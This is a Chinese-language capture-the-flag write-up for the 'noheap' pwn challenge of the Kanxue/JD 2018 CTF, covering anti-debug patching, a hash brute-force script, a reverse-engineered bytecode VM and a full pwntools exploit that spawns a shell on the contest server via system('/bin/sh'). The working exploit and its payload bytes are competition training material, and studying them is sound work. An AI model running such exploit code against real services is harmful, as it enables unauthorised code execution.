-
-
[原创] 看雪.京东 2018CTF 第六题 PWN-noheap writeup
-
2018-6-27 21:13 2763
-
1.先检查一下
所有保护全开。
2.反调试
int sub_E87() { puts( " _____ _____ _____ _ __ __ _____ _____ ___ _____ \n" "| _ \\ | ____| | _ \\ | | \\ \\ / / /___ \\ / _ \\ |_ | / _ \\ \n" "| |_| | | |__ | | | | | | \\ \\/ / ___| | | | | | | | | |_| | \n" "| ___/ | __| | | | | | | \\ / / ___/ | |/| | | | } _ { \n" "| | | |___ | |_| | | | / / | |___ | |_| | | | | |_| | \n" "|_| |_____| |_____/ |_| /_/ |_____| \\_____/ |_| \\_____/ \n"); setvbuf(stdout, 0LL, 2, 0LL); setvbuf(stdin, 0LL, 2, 0LL); alarm(0x3Cu); //这个影响调试 直接用90全patch掉 puts("Welcome !"); return puts("======================================================================="); }
3.第一关
unsigned __int64 sub_F0C() { unsigned __int8 buf; // [rsp+Fh] [rbp-51h] unsigned int v2; // [rsp+10h] [rbp-50h] int i; // [rsp+14h] [rbp-4Ch] int fd; // [rsp+18h] [rbp-48h] unsigned int v5; // [rsp+1Ch] [rbp-44h] char s1[8]; // [rsp+20h] [rbp-40h] char v7; // [rsp+28h] [rbp-38h] char s2[8]; // [rsp+30h] [rbp-30h] char v9; // [rsp+38h] [rbp-28h] unsigned __int64 v10; // [rsp+48h] [rbp-18h] v10 = __readfsqword(0x28u); *(_QWORD *)s1 = 0LL; v7 = 0; *(_QWORD *)s2 = 0LL; v9 = 0; v2 = 0; fd = open("/dev/urandom", 0); for ( i = 0; i <= 3; ++i ) { read(fd, &buf, 1uLL); v2 = (v2 << 8) + buf % 0x2Bu + 48; } *(_DWORD *)s1 = sub_108A(&v2); *(_DWORD *)&s1[4] = sub_108A(&v2); v5 = sub_10B2(s1, 8LL); printf("Hash:%08x\n", v5); printf("Input:"); sub_14F0(s2, 9LL); close(fd); if ( strcmp(s1, s2) ) exit(0); puts("======================================================================="); return __readfsqword(0x28u) ^ v10; }
从/dev/urandom 循环读取四字节,通过一定运算组成一个DWORD数值v2.
通过函数
__int64 __fastcall sub_108A(unsigned int *a1) { *a1 = 214013 * *a1 + 2531011; return *a1; }
构造一个8个字节的字符串。
IDA反编译的有点问题,其实第二次调用sub_108A时传入的事第一次调用的返回值。
接着利用sub_10b2计算一个hash,并输出出来。
__int64 __fastcall sub_10B2(unsigned __int8 *a1, int a2) { unsigned __int8 *v2; // rax int v4; // [rsp+0h] [rbp-1Ch] unsigned __int8 *v5; // [rsp+4h] [rbp-18h] unsigned int v6; // [rsp+14h] [rbp-8h] v5 = a1; v4 = a2; v6 = 0; do { v2 = v5++; v6 = 131 * v6 + *v2; --v4; } while ( v4 > 0 ); return v6; }
再接着要求我们输入一个8字节的字符串,要求跟上边的s1一致。
这关只能爆破。
从v2的生成代码(v2 = (v2 << 8) + buf % 0x2Bu + 48;)可以看出,v2的每个字节都介于[48+0,48+0x2B)之间。
利用此特性,可获取到hash值之后,爆破出v2的值,进而获取到s1字符串。
爆破代码如下:
import struct import binascii import time def time_me(fn): def _wrapper(*args, **kwargs): start = time.clock() ret=fn(*args, **kwargs) print "%s cost %s second"%(fn.__name__, time.clock() - start) return ret return _wrapper def calc_1(v2): return (214013*v2+2531011)&0xffffffff def mk_string(v2): v2_ret=calc_1(v2) #print hex(v2_ret) s="" s+=struct.pack("I",v2_ret) v2_ret=calc_1(v2_ret) #print hex(v2_ret) s+=struct.pack("I",v2_ret) #print binascii.b2a_hex(s) return s def calc_2(v2_str): #print "fuck" v6=0 for x in v2_str: v6=(0x83*v6+ord(x))&0xffffffff #print hex(v6) #print hex(v6) return v6 def calc(v2): v2_str=mk_string(v2) v2_ret=calc_2(v2_str) return v2_ret,v2_str #print calc(0x5a314f44) @time_me def Crack(in_value): ret_str="" for i1 in range(0,0x2b): for i2 in range(0,0x2b): for i3 in range(0,0x2b): for i4 in range(0,0x2b): v2=((i1+0x30)<<24)+((i2+0x30)<<16)+((i3+0x30)<<8)+((i4+0x30)) #print hex(v2) v2_ret,v2_str=calc(v2) #print hex(i),v2_ret,v2_str if v2_ret==in_value: print v2_str,binascii.b2a_hex(v2_str) ret_str=v2_str break return ret_str
此算法爆破一个值大约需要7-10s.
4.第二关
__int64 sub_1470() { __int64 result; // rax __int64 v1; // ST38_8 __int64 v2; // ST90_8 unsigned int v3; // [rsp+74h] [rbp-4h] Menu_1591(); v3 = read_1547(); result = v3; if ( v3 ) { result = v3; if ( v3 <= 3 ) { v1 = qword_2030C0[~((unsigned __int8)v3 - 1LL) - 7] ^ qword_2030C0[~((unsigned __int8)v3 - 1LL) - 2]; v2 = qword_2030C0[-11] ^ qword_2030C0[-6]; JUMPOUT(__CS__, qword_2030C0[-7] ^ qword_2030C0[-12]); } } return result; }
显示菜单并读取出来用户输入选项之后就会进入虚拟机。
虚拟机先不说,先说三个选项。
1.Malloc函数
主要的漏洞就在这个函数。
2.show
3.free
看完这三个函数,刚开始没有发现读取数据时会覆盖vm_code,还以为是house_of_force。https://ctf-wiki.github.io/ctf-wiki/pwn/heap/house_of_force/
但是此题中qword_203240处只能保存最后一次申请的空间,没办法形成此利用提交。
郁闷了好久想起来了之前的比赛,此题出题思路应该是跟 看雪.Wifi万能钥匙 2017CTF年中赛 第九题 Silence Server
https://ctf.pediy.com/game-fight-39.htm
是一样的似乎,要利用虚拟机进行操作。
虚拟机代码:
.text:00005574B3183107 sub_5574B3183107 proc near ; DATA XREF: sub_5574B3182CB5+FB↑o .text:00005574B3183107 .text:00005574B3183107 var_40= qword ptr -40h .text:00005574B3183107 var_38= qword ptr -38h .text:00005574B3183107 var_30= qword ptr -30h .text:00005574B3183107 var_28= qword ptr -28h .text:00005574B3183107 var_20= qword ptr -20h .text:00005574B3183107 var_18= qword ptr -18h .text:00005574B3183107 var_10= qword ptr -10h .text:00005574B3183107 var_8= qword ptr -8 .text:00005574B3183107 .text:00005574B3183107 mov [rbp+var_40], 0 .text:00005574B318310F mov [rbp+var_10], 0 .text:00005574B3183117 mov [rbp+var_30], 0 .text:00005574B318311F mov [rbp+var_8], 0 .text:00005574B3183127 mov [rbp+var_28], 0 .text:00005574B318312F mov [rbp+var_38], 0 .text:00005574B3183137 mov [rbp+var_20], 0 .text:00005574B318313F mov [rbp+var_18], 0 .text:00005574B3183147 .text:00005574B3183147 main_: ; CODE XREF: sub_5574B3183107:default1↓j .text:00005574B3183147 mov rdx, [rbp+var_40] ; rbp-40h vm_code[index] .text:00005574B318314B lea rax, vm_code .text:00005574B3183152 add rax, rdx .text:00005574B3183155 movzx eax, byte ptr [rax] .text:00005574B3183158 movsx rax, al .text:00005574B318315C mov [rbp+var_10], rax .text:00005574B3183160 cmp [rbp+var_10], 16h ; switch 23 cases .text:00005574B3183165 ja default ; jumptable 000000000000118E default case .text:00005574B318316B mov rax, [rbp+var_10] .text:00005574B318316F lea rdx, ds:0[rax*4] .text:00005574B3183177 lea rax, jump_table .text:00005574B318317E mov eax, [rdx+rax] .text:00005574B3183181 movsxd rdx, eax .text:00005574B3183184 lea rax, jump_table .text:00005574B318318B add rax, rdx .text:00005574B318318E jmp rax ; switch jump .text:00005574B3183190 ; --------------------------------------------------------------------------- .text:00005574B3183190 .text:00005574B3183190 case_1: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183190 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183190 mov rax, [rbp+var_40] ; jumptable 000000000000118E case 1 .text:00005574B3183194 lea rdx, [rax+1] .text:00005574B3183198 lea rax, vm_code .text:00005574B318319F add rax, rdx .text:00005574B31831A2 movzx eax, byte ptr [rax] .text:00005574B31831A5 movzx eax, al .text:00005574B31831A8 mov [rbp+var_30], rax ; .text:00005574B31831AC mov rax, [rbp+var_40] .text:00005574B31831B0 add rax, 2 .text:00005574B31831B4 mov [rbp+var_40], rax ; [rbp-40h]+=2 .text:00005574B31831B8 jmp default1 .text:00005574B31831BD ; --------------------------------------------------------------------------- .text:00005574B31831BD .text:00005574B31831BD case_2: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31831BD ; DATA XREF: .rodata:jump_table↓o .text:00005574B31831BD lea rdx, vm_code ; jumptable 000000000000118E case 2 .text:00005574B31831C4 mov rax, [rbp+var_30] .text:00005574B31831C8 add rax, rdx .text:00005574B31831CB movzx eax, byte ptr [rax] .text:00005574B31831CE movzx eax, al .text:00005574B31831D1 mov [rbp+var_28], rax ; .text:00005574B31831D5 mov rax, [rbp+var_40] .text:00005574B31831D9 add rax, 1 .text:00005574B31831DD mov [rbp+var_40], rax .text:00005574B31831E1 jmp default1 .text:00005574B31831E6 ; --------------------------------------------------------------------------- .text:00005574B31831E6 .text:00005574B31831E6 case_3: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31831E6 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31831E6 lea rdx, vm_code ; jumptable 000000000000118E case 3 .text:00005574B31831ED mov rax, [rbp+var_30] .text:00005574B31831F1 add rax, rdx .text:00005574B31831F4 mov rax, [rax] .text:00005574B31831F7 mov [rbp+var_38], rax .text:00005574B31831FB mov rax, [rbp+var_40] .text:00005574B31831FF add rax, 1 .text:00005574B3183203 mov [rbp+var_40], rax .text:00005574B3183207 jmp default1 .text:00005574B318320C ; --------------------------------------------------------------------------- .text:00005574B318320C .text:00005574B318320C case_4: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318320C ; DATA XREF: .rodata:jump_table↓o .text:00005574B318320C lea rdx, vm_code ; jumptable 000000000000118E case 4 .text:00005574B3183213 mov rax, [rbp+var_30] .text:00005574B3183217 add rax, rdx .text:00005574B318321A mov rax, [rax] .text:00005574B318321D mov [rbp+var_20], rax .text:00005574B3183221 mov rax, [rbp+var_40] .text:00005574B3183225 add rax, 1 .text:00005574B3183229 mov [rbp+var_40], rax .text:00005574B318322D jmp default1 .text:00005574B3183232 ; --------------------------------------------------------------------------- .text:00005574B3183232 .text:00005574B3183232 case_5: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183232 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183232 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 5 .text:00005574B3183236 sub rax, [rbp+var_20] .text:00005574B318323A mov [rbp+var_38], rax .text:00005574B318323E mov rax, [rbp+var_40] .text:00005574B3183242 add rax, 1 .text:00005574B3183246 mov [rbp+var_40], rax .text:00005574B318324A jmp default1 .text:00005574B318324F ; --------------------------------------------------------------------------- .text:00005574B318324F .text:00005574B318324F case_6: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318324F ; DATA XREF: .rodata:jump_table↓o .text:00005574B318324F mov rdx, [rbp+var_38] ; jumptable 000000000000118E case 6 .text:00005574B3183253 mov rax, [rbp+var_20] .text:00005574B3183257 add rax, rdx .text:00005574B318325A mov [rbp+var_38], rax .text:00005574B318325E mov rax, [rbp+var_40] .text:00005574B3183262 add rax, 1 .text:00005574B3183266 mov [rbp+var_40], rax .text:00005574B318326A jmp default1 .text:00005574B318326F ; --------------------------------------------------------------------------- .text:00005574B318326F .text:00005574B318326F case_7: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318326F ; DATA XREF: .rodata:jump_table↓o .text:00005574B318326F mov rax, [rbp+var_38] ; jumptable 000000000000118E case 7 .text:00005574B3183273 imul rax, [rbp+var_20] .text:00005574B3183278 mov [rbp+var_38], rax .text:00005574B318327C mov rax, [rbp+var_40] .text:00005574B3183280 add rax, 1 .text:00005574B3183284 mov [rbp+var_40], rax .text:00005574B3183288 jmp default1 .text:00005574B318328D ; --------------------------------------------------------------------------- .text:00005574B318328D .text:00005574B318328D case_8: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318328D ; DATA XREF: .rodata:jump_table↓o .text:00005574B318328D mov rax, [rbp+var_38] ; jumptable 000000000000118E case 8 .text:00005574B3183291 mov edx, 0 .text:00005574B3183296 div [rbp+var_20] .text:00005574B318329A mov [rbp+var_38], rax .text:00005574B318329E mov rax, [rbp+var_40] .text:00005574B31832A2 add rax, 1 .text:00005574B31832A6 mov [rbp+var_40], rax .text:00005574B31832AA jmp default1 .text:00005574B31832AF ; --------------------------------------------------------------------------- .text:00005574B31832AF .text:00005574B31832AF case_9: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31832AF ; DATA XREF: .rodata:jump_table↓o .text:00005574B31832AF mov rax, [rbp+var_38] ; jumptable 000000000000118E case 9 .text:00005574B31832B3 xor rax, [rbp+var_20] .text:00005574B31832B7 mov [rbp+var_38], rax .text:00005574B31832BB mov rax, [rbp+var_40] .text:00005574B31832BF add rax, 1 .text:00005574B31832C3 mov [rbp+var_40], rax .text:00005574B31832C7 jmp default1 .text:00005574B31832CC ; --------------------------------------------------------------------------- .text:00005574B31832CC .text:00005574B31832CC case_10: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31832CC ; DATA XREF: .rodata:jump_table↓o .text:00005574B31832CC mov rax, [rbp+var_38] ; jumptable 000000000000118E case 10 .text:00005574B31832D0 and rax, [rbp+var_20] .text:00005574B31832D4 mov [rbp+var_38], rax .text:00005574B31832D8 mov rax, [rbp+var_40] .text:00005574B31832DC add rax, 1 .text:00005574B31832E0 mov [rbp+var_40], rax .text:00005574B31832E4 jmp default1 .text:00005574B31832E9 ; --------------------------------------------------------------------------- .text:00005574B31832E9 .text:00005574B31832E9 case_11: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31832E9 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31832E9 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 11 .text:00005574B31832ED or rax, [rbp+var_20] .text:00005574B31832F1 mov [rbp+var_38], rax .text:00005574B31832F5 mov rax, [rbp+var_40] .text:00005574B31832F9 add rax, 1 .text:00005574B31832FD mov [rbp+var_40], rax .text:00005574B3183301 jmp default1 .text:00005574B3183306 ; --------------------------------------------------------------------------- .text:00005574B3183306 .text:00005574B3183306 case12: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183306 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183306 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 12 .text:00005574B318330A cmp rax, [rbp+var_20] .text:00005574B318330E jnz short loc_5574B318331A .text:00005574B3183310 mov [rbp+var_18], 0 .text:00005574B3183318 jmp short loc_5574B3183322 .text:00005574B318331A ; --------------------------------------------------------------------------- .text:00005574B318331A .text:00005574B318331A loc_5574B318331A: ; CODE XREF: sub_5574B3183107+207↑j .text:00005574B318331A mov [rbp+var_18], 1 .text:00005574B3183322 .text:00005574B3183322 loc_5574B3183322: ; CODE XREF: sub_5574B3183107+211↑j .text:00005574B3183322 mov rax, [rbp+var_40] .text:00005574B3183326 add rax, 1 .text:00005574B318332A mov [rbp+var_40], rax .text:00005574B318332E jmp default1 .text:00005574B3183333 ; --------------------------------------------------------------------------- .text:00005574B3183333 .text:00005574B3183333 case_13: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183333 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183333 cmp [rbp+var_18], 0 ; jumptable 000000000000118E case 13 .text:00005574B3183338 jnz short loc_5574B3183357 .text:00005574B318333A mov rdx, [rbp+var_40] .text:00005574B318333E lea rax, vm_code .text:00005574B3183345 add rax, rdx .text:00005574B3183348 movzx eax, byte ptr [rax] .text:00005574B318334B movzx eax, al .text:00005574B318334E mov [rbp+var_40], rax .text:00005574B3183352 jmp default1 .text:00005574B3183357 ; --------------------------------------------------------------------------- .text:00005574B3183357 .text:00005574B3183357 loc_5574B3183357: ; CODE XREF: sub_5574B3183107+231↑j .text:00005574B3183357 mov rax, [rbp+var_40] .text:00005574B318335B add rax, 2 .text:00005574B318335F mov [rbp+var_40], rax .text:00005574B3183363 jmp default1 .text:00005574B3183368 ; --------------------------------------------------------------------------- .text:00005574B3183368 .text:00005574B3183368 case_14: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183368 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183368 mov rax, [rbp+var_28] ; jumptable 000000000000118E case 14 .text:00005574B318336C mov [rbp+var_38], rax .text:00005574B3183370 mov rax, [rbp+var_40] .text:00005574B3183374 add rax, 1 .text:00005574B3183378 mov [rbp+var_40], rax .text:00005574B318337C jmp default1 .text:00005574B3183381 ; --------------------------------------------------------------------------- .text:00005574B3183381 .text:00005574B3183381 case15: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183381 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183381 mov rax, [rbp+var_28] ; jumptable 000000000000118E case 15 .text:00005574B3183385 mov [rbp+var_20], rax .text:00005574B3183389 mov rax, [rbp+var_40] .text:00005574B318338D add rax, 1 .text:00005574B3183391 mov [rbp+var_40], rax .text:00005574B3183395 jmp default1 .text:00005574B318339A ; --------------------------------------------------------------------------- .text:00005574B318339A .text:00005574B318339A case16: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318339A ; DATA XREF: .rodata:jump_table↓o .text:00005574B318339A mov rax, [rbp+var_38] ; jumptable 000000000000118E case 16 .text:00005574B318339E mov [rbp+var_28], rax .text:00005574B31833A2 mov rax, [rbp+var_40] .text:00005574B31833A6 add rax, 1 .text:00005574B31833AA mov [rbp+var_40], rax .text:00005574B31833AE jmp default1 .text:00005574B31833B3 ; --------------------------------------------------------------------------- .text:00005574B31833B3 .text:00005574B31833B3 case17: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31833B3 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31833B3 mov rax, [rbp+var_20] ; jumptable 000000000000118E case 17 .text:00005574B31833B7 mov [rbp+var_28], rax .text:00005574B31833BB mov rax, [rbp+var_40] .text:00005574B31833BF add rax, 1 .text:00005574B31833C3 mov [rbp+var_40], rax .text:00005574B31833C7 jmp default1 .text:00005574B31833CC ; --------------------------------------------------------------------------- .text:00005574B31833CC .text:00005574B31833CC case18: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31833CC ; DATA XREF: .rodata:jump_table↓o .text:00005574B31833CC mov rax, [rbp+var_20] ; jumptable 000000000000118E case 18 .text:00005574B31833D0 mov [rbp+var_38], rax .text:00005574B31833D4 mov rax, [rbp+var_40] .text:00005574B31833D8 add rax, 1 .text:00005574B31833DC mov [rbp+var_40], rax .text:00005574B31833E0 jmp default1 .text:00005574B31833E5 ; --------------------------------------------------------------------------- .text:00005574B31833E5 .text:00005574B31833E5 case19: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B31833E5 ; DATA XREF: .rodata:jump_table↓o .text:00005574B31833E5 mov rax, [rbp+var_30] ; jumptable 000000000000118E case 19 .text:00005574B31833E9 shl rax, 3 .text:00005574B31833ED neg rax .text:00005574B31833F0 mov rdx, rax .text:00005574B31833F3 lea rax, [rbp+var_40] .text:00005574B31833F7 add rax, rdx .text:00005574B31833FA mov rax, [rax] .text:00005574B31833FD mov [rbp+var_38], rax .text:00005574B3183401 mov rax, [rbp+var_40] .text:00005574B3183405 add rax, 1 .text:00005574B3183409 mov [rbp+var_40], rax .text:00005574B318340D jmp short default1 .text:00005574B318340F ; --------------------------------------------------------------------------- .text:00005574B318340F .text:00005574B318340F case20: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318340F ; DATA XREF: .rodata:jump_table↓o .text:00005574B318340F mov rax, [rbp+var_30] ; jumptable 000000000000118E case 20 .text:00005574B3183413 shl rax, 3 .text:00005574B3183417 neg rax .text:00005574B318341A mov rdx, rax .text:00005574B318341D lea rax, [rbp+var_40] .text:00005574B3183421 add rdx, rax .text:00005574B3183424 mov rax, [rbp+var_38] .text:00005574B3183428 mov [rdx], rax .text:00005574B318342B mov rax, [rbp+var_40] .text:00005574B318342F add rax, 1 .text:00005574B3183433 mov [rbp+var_40], rax .text:00005574B3183437 jmp short default1 .text:00005574B3183439 ; --------------------------------------------------------------------------- .text:00005574B3183439 .text:00005574B3183439 case21: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B3183439 ; DATA XREF: .rodata:jump_table↓o .text:00005574B3183439 add [rbp+var_28], 1 ; jumptable 000000000000118E case 21 .text:00005574B318343E mov rax, [rbp+var_40] .text:00005574B3183442 add rax, 1 .text:00005574B3183446 mov [rbp+var_40], rax .text:00005574B318344A jmp short default1 .text:00005574B318344C ; --------------------------------------------------------------------------- .text:00005574B318344C .text:00005574B318344C case22: ; CODE XREF: sub_5574B3183107+87↑j .text:00005574B318344C ; DATA XREF: .rodata:jump_table↓o .text:00005574B318344C mov rax, [rbp+var_40] ; jumptable 000000000000118E case 22 .text:00005574B3183450 add rax, 1 .text:00005574B3183454 mov [rbp+var_40], rax .text:00005574B3183458 mov rax, [rbp+var_38] .text:00005574B318345C jmp rax ; 跳add .text:00005574B318345E ; --------------------------------------------------------------------------- .text:00005574B318345E jmp short default1 .text:00005574B3183460 ; --------------------------------------------------------------------------- .text:00005574B3183460 .text:00005574B3183460 default: ; CODE XREF: sub_5574B3183107+5E↑j .text:00005574B3183460 ; sub_5574B3183107+87↑j .text:00005574B3183460 ; DATA XREF: ... .text:00005574B3183460 add rsp, 80h ; jumptable 000000000000118E default case .text:00005574B3183467 jmp short loc_5574B318346E .text:00005574B3183469 ; --------------------------------------------------------------------------- .text:00005574B3183469 .text:00005574B3183469 default1: ; CODE XREF: sub_5574B3183107+B1↑j .text:00005574B3183469 ; sub_5574B3183107+DA↑j ... .text:00005574B3183469 jmp main_ ; rbp-40h vm_code[index] .text:00005574B318346E ; --------------------------------------------------------------------------- .text:00005574B318346E .text:00005574B318346E loc_5574B318346E: ; CODE XREF: sub_5574B3183107+360↑j .text:00005574B318346E pop rbp .text:00005574B318346F retn .text:00005574B318346F ; } // starts at 5574B31830FE .text:00005574B318346F sub_5574B3183107 endp ; sp-analysis failed
整理之后的指令表。
栈中情况
利用思路:
1.第一次malloc的时候,size设为0,并将payload写入。
payload=‘A’*80+'0'*0xe+vm_code
第一部分只为填充
第二部分 是之前跳转到Malloc函数时已经执行的指令,这里随便可以是什么值
第三部分是从Malloc函数返回之后开始执行的vm_code
返回之后:
var_40 在00007FFC593372D0处
print函数地址在00007F616CA8A899处
var_40[-0x2d]处即是此值。
有了printf的地址,可利用vm代码计算出system地址和/bin/sh的地址。并把这两个值压栈。
最后根据var_40上边的malloc的地址
00007FFC593372C0 E4 85 50 67 B9 55 00 00
计算出rop跳板地址:
.text:000055B9675087E3 pop rdi .text:000055B9675087E4 retn
即可执行system("/bin/sh")
vm_code 布置如下:
#计算system地址 并压栈 01 2d :var_30=2d 13 :var_38=var_40[-var_30] var_38=printf_addr+99 01 27 :var_30=27 04 :var_20=vm_code[var_30] =0x0000000000010509 05 :var_38=var_38-var_20 var_38=system_addr 01 07 :var_30=07 14 :var_40[-var_30]=var_38 [rsp+8]=system_addr #计算/bin/sh字符串地址并压栈 01 2f :var_30=2f 04 :var_20=vm_code[var_30] =0x00000000001479c7 06 :var_38=var_38+var_20 var_38=binsh_str_addr 0108 :var_30=08 14 :var_40[-var_30]=var_38 [rsp]=binsh_str_addr #计算rop地址并跳转 01 02 :var_30=2 13 :var_38=var_40[-var_30] var_38=add_addr malloc_addr 01 37 :var_30=37 04 :var_20=vm_code[var_30] =0x00000000000001ff 06 :var_38=var_38+var_20 var_38==rop_addr 16 :jmp var_38 local_system=0x45390 local_printf=0x55800 net_system=0x45390 net_printf=0x55800 0905010000000000:offset1 =printf_addr-local_printf+local_system=var_38-0x99-0x55800+0x45390=var_38-0x10509 c779140000000000:offset2 =system_addr-binsh_str_addr ff01000000000000:offset3 =rop_arrr-add_addr=00005574B31837E3-00005574B31835E4=0x1ff
完整exp:
from pwn import * import binascii import time import struct g_local=False context.log_level='debug' import struct import binascii import time def time_me(fn): def _wrapper(*args, **kwargs): start = time.clock() ret=fn(*args, **kwargs) print "%s cost %s second"%(fn.__name__, time.clock() - start) return ret return _wrapper def calc_1(v2): return (214013*v2+2531011)&0xffffffff def mk_string(v2): v2_ret=calc_1(v2) #print hex(v2_ret) s="" s+=struct.pack("I",v2_ret) v2_ret=calc_1(v2_ret) #print hex(v2_ret) s+=struct.pack("I",v2_ret) #print binascii.b2a_hex(s) return s def calc_2(v2_str): #print "fuck" v6=0 for x in v2_str: v6=(0x83*v6+ord(x))&0xffffffff #print hex(v6) #print hex(v6) return v6 def calc(v2): v2_str=mk_string(v2) v2_ret=calc_2(v2_str) return v2_ret,v2_str #print calc(0x5a314f44) @time_me def Crack(in_value): ret_str="" for i1 in range(0,0x2b): for i2 in range(0,0x2b): for i3 in range(0,0x2b): for i4 in range(0,0x2b): v2=((i1+0x30)<<24)+((i2+0x30)<<16)+((i3+0x30)<<8)+((i4+0x30)) #print hex(v2) v2_ret,v2_str=calc(v2) #print hex(i),v2_ret,v2_str if v2_ret==in_value: print v2_str,binascii.b2a_hex(v2_str) ret_str=v2_str break return ret_str sh=0 if g_local: sh=process("./noheap") raw_input("ida has attch? Press any key for continue...") else: sh=remote("139.199.99.130",8989) def get_hash(text): #print text index1=text.find("Hash:") index2=text.find("\n",index1) #print index1,index2 #print text[index1+5:index2] return text[index1+5:index2] def add(size,context): sh.sendline("1") print sh.recvuntil("Size :") sh.sendline(str(size)) print sh.recvuntil("Content :") sh.sendline(context) #print sh.recv(0x200) def free(): sh.sendline("3") print sh.recv(200) ''' 012d :var_30=2d 13 :var_38=var_40[-var_30] var_38=printf_addr+99 0127 :var_30=27 04 :var_20=vm_code[var_30] =0x0000000000010509 05 :var_38=var_38-var_20 var_38=system_addr 0107 :var_30=07 14 :var_40[-var_30]=var_38 [rsp+8]=system_addr 012f :var_30=2f 04 :var_20=vm_code[var_30] =0x00000000001479c7 06 :var_38=var_38+var_20 var_38=binsh_str_addr 0108 :var_30=08 14 :var_40[-var_30]=var_38 [rsp]=binsh_str_addr 0102 :var_30=2 13 :var_38=var_40[-var_30] var_38=add_addr malloc_addr 0137 :var_30=37 04 :var_20=vm_code[var_30] =0x00000000000001ff 06 :var_38=var_38+var_20 var_38==rop_addr 16 :jmp var_38 local_system=0x45390 local_printf=0x55800 net_system=0x45390 net_printf=0x55800 0905010000000000:offset1 =printf_addr-local_printf+local_system=var_38-0x99-0x55800+0x45390=var_38-0x10509 c779140000000000:offset2 =system_addr-binsh_str_addr ff01000000000000:offset3 =rop_arrr-add_addr=00005574B31837E3-00005574B31835E4=0x1ff ''' vm_code ="\x01\x2d\x13\x01\x27\x04\x05\x01\x07\x14\x01\x2f\x04\x06\x01\x08\x14\x01\x02\x13\x01\x37\x04\x06\x16\x09\x05\x01\x00\x00\x00\x00\x00\xc7\x79\x14\x00\x00\x00\x00\x00\xff\x01\x00\x00\x00\x00\x00\x00" def test(): wel_text=sh.recvuntil("Input:") #print wel_text hash_str=get_hash(wel_text) #print "xxxxx",hash_str #raw_input() print("Crack hash.........") str_input=Crack(int(hash_str,16)) print "input string",str_input sh.sendline(str_input) print sh.recv(200) raw_input() payload="" payload+='A'*0x8e payload+=vm_code raw_input() add(0, payload) #add(16,"xxxxxxxxxxxxx") sh.interactive() test()
本地与服务器地址一致,直接运行即可:
此flag包含\n,只有全部复制粘贴才能提交成功,涉嫌违规。
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2018-6-27 21:15
被lacoucou编辑
,原因:
赞赏
他的文章
看原图